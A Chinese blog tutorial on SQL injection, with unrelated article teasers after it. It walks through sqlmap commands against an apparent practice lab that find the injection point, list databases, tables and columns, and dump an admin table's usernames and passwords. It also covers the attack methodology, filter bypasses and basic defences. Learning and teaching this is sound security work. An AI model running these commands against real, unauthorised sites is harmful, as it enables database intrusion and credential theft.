sql注入漏洞及其sqlmap工具的使用

news2024/11/15 23:47:02

一、sql注入的原理

sql注入概念:

  sql注入主要是将sql语句,插入到web表单提交或者输入域名或者页面请求的查询字符串,最 终      达到一个欺骗服务器执行sql语句的效果。

sql注入的原理:主要分为平台层注入和代码层注入两种原因

平台层注入:平台层注入主要是因为数据库本身就存在有漏洞、或者进行了不安全的数据库配置。

代码层注入:代码层注入主要是因为,程序员在编写代码的时候、没有做严谨的代码过滤。从而执行了非 法的数据查询

二、sql注入靶机的搭建

http://inject1.lab.aqlab.cn:8003/index.php?id=1

三、使用sqlmap进行sql注入

(1).查看sql注入点和数据库类型
sqlmap -u(指定参数url) http://inject1.lab.aqlab.cn:8003/index.php?id=1 

我们可以看到注入点为get型。
注入方式为:布尔盲注和时间盲注。
数据库类型为:mysql
数据库版本为:5.0.12 

(2).查看数据库databases名称
sqlmap -u(指定参数url) http://inject1.lab.aqlab.cn:8003/index.php?id=1 --current-db

上述注入结果可以得知:
    1.web服务器的操作系统为:Windows
    2.web应用技术:PHP版本为5.4.45;Apache版本为2.4.23
    3.数据库名称databases为:"maoshe"

(3).查看databases下的table表的内容
sqlmap -u "http://inject1.lab.aqlab.cn:8003/index.php?id=1" -D "maoshe" --tables
sqlmap -u(指定参数) "sql注入网址" -D "databases" --tables

 我们得到tables下的一张数据库表格:
    主要包括:admin、dirs、news、xss

(4).查看tables下创建的数据库表的结构
sqlmap -u "http://inject1.lab.aqlab.cn:8003/index.php?id=1" -D "maoshe"
	   -T "admin" --columns

此时查看到数据库databases:"maoshe"下的table:"admin"的表数据结构
    包含有:id、username、password 

(5).查看表中 "admin"的数据库表中的内容
sqlmap -u "http://inject1.lab.aqlab.cn:8003/index.php?id=1" -D "maoshe"
	   -T "admin" -C "id,username,password" --dump

此时我们就拿到了网站的登录账号和密码,以及他的保存地址路径。 

四、sql注入的思路是什么?

1、首先进行判断注入点,如(get注入、post注入、cookie注入、http请求头注入等)

2、进行数据库类型的判断(MySQL、Oracle、sqlserver)

        判断方法:(1).对其进行注入,通过报错类型信息进行判断

                          (2).判断数据库的端口,MySQL3306端口、Oracle1521端口

3、判断参数的数据类型:数值型和字符型

4、判断数据库的语句过滤情况:判断列数、判断显示位

5、进行绕过和过滤:关键字、逗号、等号、大于小于号、等价函数

6、根据注入情况选择注入方式:时间盲注、布尔盲注、联合查询、报错注入

五、sql注入完成后没有反应是为什么?

首先,无论SQL注入成功或者失败、都有可能造成没有反应。

sql注入成功了没有反应的原因:

SQL注入成功但没有回显”,这通常意味着已经成功地插入了恶意的SQL代码到目标应用中。

原因:盲注:目标应用可能故意隐藏了查询结果,以防止直接的信息泄露。

          输出限制:应用的输出可能受到某种形式的限制或过滤,导致即使注入成功,效果也不会被                              明 显展示出来。

         检查其他输出点:应用可能在其他地方(如日志,其他页面等)显示了与注入相关的输出。

sql注入失败了没有反应的原因:

   原因:1、sql注入的语句错误、或者被目标系统采取了相应的保护措施、导致被过滤掉了。

              2、目标系统存在日志监控日志、一旦检测到有可疑的sql注入语句、就会立即进行拦截。

              3、攻击者的网络配置或者目标系统的操作系统原因,导致没有成功的发出或者接受。

六、如何对sql注入进行防御?

  1. 日志和监控:实施日志记录和监控机制,以便及时发现和响应任何可疑活动。

  2. 使用Web应用防火墙(WAF): WAF可以识别和拦截常见的Web攻击。它可以通过检测和分析传入的HTTP请求来识别恶意模式

  3. 更新和修补: 保持数据库管理系统、应用程序框架和所有相关组件的更新。及时应用安全补丁,以修复已知的漏洞。

    4.限制和验证用户输入: 对所有的用户输入进行严格的验证和过滤,确保输入的数据符合预期             的格式和类型。

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1630739.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

TechTool Pro for mac中文激活版:硬件监测和系统维护工具

TechTool Pro mac帮助用户实现系统硬件监测(CPU、内存、硬盘、网络、USB等)、内存测试、S.M.A.R.T检测、磁盘宗卷扫描、宗卷重建和优化、数据恢复和粉碎等等,定期使用,可以确保您的Mac保持优化和无故障。 TechTool Pro for mac v1…

(学习日记)2024.04.19:UCOSIII第四十七节:各文件夹功能介绍

之前的章节都是针对某个或某些知识点进行的专项讲解,重点在功能和代码解释。 回到最初开始学μC/OS-III系统时,当时就定下了一个目标,不仅要读懂,还要读透,改造成更适合中国宝宝体质的使用方式。在学完野火的教程后&a…

JavaScript操作DOM实现页面元素更改

DOM是什么 DOM(文档对象模型)是一种用于表示和操作HTML、XML文档的标准编程接口。它将文档中的每个元素、属性、文本和事件都表示为对象,从而可以使用JavaScript等脚本语言来操作和修改文档的结构、样式和内容。 DOM 将文档表示为一个树状结…

AI绘画的算法原理:从生成模型到Diffusion

近年来,AI绘画技术引起了广泛关注,让我们深入探讨其背后的技术原理和发展历程。本文将以通俗易懂的方式,介绍AI绘画的核心算法,从生成模型到Diffusion。 1. 计算机如何生成图画? AI绘画的核心在于生成模型&#xff08…

【平台开发】MTK6833 实现lk下CQE接口移植 - cmdq request

1.函数调用图 对应协议上结构为: 2.函数拆解 cmdq_request: 1)配置task_desc和tran_desc参数 2)EN_CQHCI_IRQ 3)write CQTDBR cmdq_prep_task_desc: 设置task_desc参数 cmdq_set_tran_desc: 设置tran_desc参数

Elasticsearch下载

1 最新版下载地址 Download Elasticsearch | Elastic https://www.elastic.co/cn/downloads/elasticsearch 2 其他版本下载地址 https://www.elastic.co/cn/downloads/past-releases#elasticsearch 7.9.2:https://artifacts.elastic.co/downloads/elasticsearch/elasticsear…

github two-factor authentication是个啥?

最近在逛github时,总是时不时会弹出一下界面,很烦 看到红框里的文字,这明显是强制要求做这个认证,如果不认证4天后账号将不可访问,所以今天花点时间看看怎么做这个认证,点“Enable 2FA now”进入这个界面&a…

LVGL移植

Lvgl介绍 LVGL是一个开源的图形库,专为嵌入式系统设计。它提供了丰富的图形元素和功能,可以帮助开发者快速构建现代化的用户界面。LVGL具有跨平台的特性,支持多种操作系统和硬件平台,包括ARM Cortex-M,ESP32&#xff…

【Protobuf】protobuf详细介绍

protobuf详细介绍 一、前言二、Protobuf简介2.1、核心思想2.2、Protobuf是如何工作的?2.3、如何使用 Protoc 生成代码?2.4 入门命令 一、前言 在以往的项目中进行网络通信和数据交换的应用场景中,最经常使用的技术便是json或xml。随着JSON的…

flac转wav怎么转?4种简单又快速的方法~

FLAC(Free Lossless Audio Codec)是一种无损音频编解码器,它可以将音频压缩成较小的文件大小而不损失任何音频质量。因此,将FLAC文件转换为WAV(Waveform Audio File Format)格式不会损失音频质量&#xff0…

Coursera: An Introduction to American Law 学习笔记 Week 02: Contract Law

An Introduction to American Law 本文是 https://www.coursera.org/programs/career-training-for-nevadans-k7yhc/learn/american-law 这门课的学习笔记。 文章目录 An Introduction to American LawInstructors Week 02: Contract LawKey Contract Law TermsSupplemental Re…

谷歌个人号秒过审,他都做了什么?“20+14”封测怎么解决?

近日,有开发者分享称自己在使用谷歌个人号提交正式版应用时秒过审。在目前谷歌上架市场如此严峻的形势下,“秒过审”,这是多么小众的词汇! 相信大家都清楚,谷歌的审核系统正变得越来越智能和严格,这无疑加大…

筛选日志并生成序列化文件

1.在idea中创建项目 selectData. 2.添加依赖,插件包,指定打包方式,日志文件 大家可以直接从前面项目复制。 3.本次只需要进行序列化操作,所以不需要Reducer模块,编写Mapper模块 package com.maidu.selectdata;import…

MySQL的数据备份和恢复

📟作者主页:慢热的陕西人 🌴专栏链接:MySQL 📣欢迎各位大佬👍点赞🔥关注🚓收藏,🍉留言 本博客主要内容涉及到mysql数据库的备份和恢复 文章目录 MySQL的数据备…

电力和能源行业如何选择设备管理系统

电力和能源行业的设备维护至关重要。无论是以煤炭、核反应还是水为燃料,发电厂都需要持续的维护以确保安全高效的能源生产。发电厂维护工程师负责执行维护工作,以满足行业标准,同时,迅速解决问题至关重要,因为未解决的…

哪款洗地机最好用?2024年四大口碑一流品牌推荐

随着人们生活质量的提升,人们的扫地、拖地都可以用智能清洁工具来高效完成,像洗地机它集合了扫地、拖地、自清洁等功能,让我们摆脱了每次打扫卫生就像打仗一样,忙活半小时下来腰酸背痛的窘境。所以越来越多的家庭纷纷开始用洗地机…

FreeBSD下安装Linux兼容系统Ubuntu

FreeBSD有个很神奇的功能,就是跟Linux二进制兼容,也就是可以直接运行linux的bin文件。还有个更神奇的功能,就是能运行出一套Linux系统,完全是linux的用户,linux的目录系统,而且还可以选是Centos系统还是Ubu…

pycharm-ieda-phpstorm超级好用插件,一键解释代码

功能:解释你看不懂的代码 当你在写python和Java代码的时候,总有你看不懂的代码,怎么办?csdn搜?那不麻烦,直接插件解决。 来安装:文件-设置 点击插件-Marketplace-搜索通义灵码 安装完成后&…

Cmake Learn

目录 1 常用命令 (1)configure_file (2).cmake文件 (3) install (4)include_directories (5) add_subdirectory (6) find_libr…

GDPU JavaWeb Servlet实现

踏入mvc的Controller层,实现servlet配置。 登录页面 1.参考课堂例子,客户端通过login.jsp发出登录请求,请求提交到loginServlet处理。如果用户名和密码相同则视为登录成功,跳转到loginSuccess.jsp页面,显示“欢迎你”用…